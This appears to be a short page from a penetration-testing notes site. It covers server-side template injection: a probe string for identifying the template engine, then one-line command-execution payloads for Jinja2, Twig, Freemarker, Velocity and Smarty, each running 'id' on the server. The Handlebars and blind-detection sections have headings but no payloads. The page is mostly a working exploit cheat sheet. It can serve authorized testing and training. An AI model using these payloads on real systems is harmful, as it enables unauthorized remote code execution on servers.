search
LinkedInGithub
githubEdit

2. Server-Side Template Injection (SSTI)

hashtag
Identifying SSTI:

  • Test String: {{<%[%'"}}\. → Identify templating engine

hashtag
Exploiting SSTI by Templating Engine:

hashtag
Jinja2 (Python)

{{config.items()[4][1].__class__.__init__.__globals__['os'].popen('id').read()}}

hashtag
Twig (PHP)

{{system('id')}}

hashtag
Freemarker (Java)

${new java.lang.ProcessBuilder("id").start()}

hashtag
Velocity (Java)

#set($e="e")#set($x=$e.class.forName("java.lang.Runtime").getRuntime().exec("id"))$x

hashtag
Smarty (PHP)

{${system('id')}}

hashtag
Handlebars (JavaScript)

hashtag
Blind SSTI:

  • Timing-based detection:

  • Out-of-Band SSTI Detection (e.g., Burp Collaborator, interacting with external DNS services)

PreviousSSTI (Server-Side Template Injection)Nextvaule-and-parameter-fuzzing

Last updated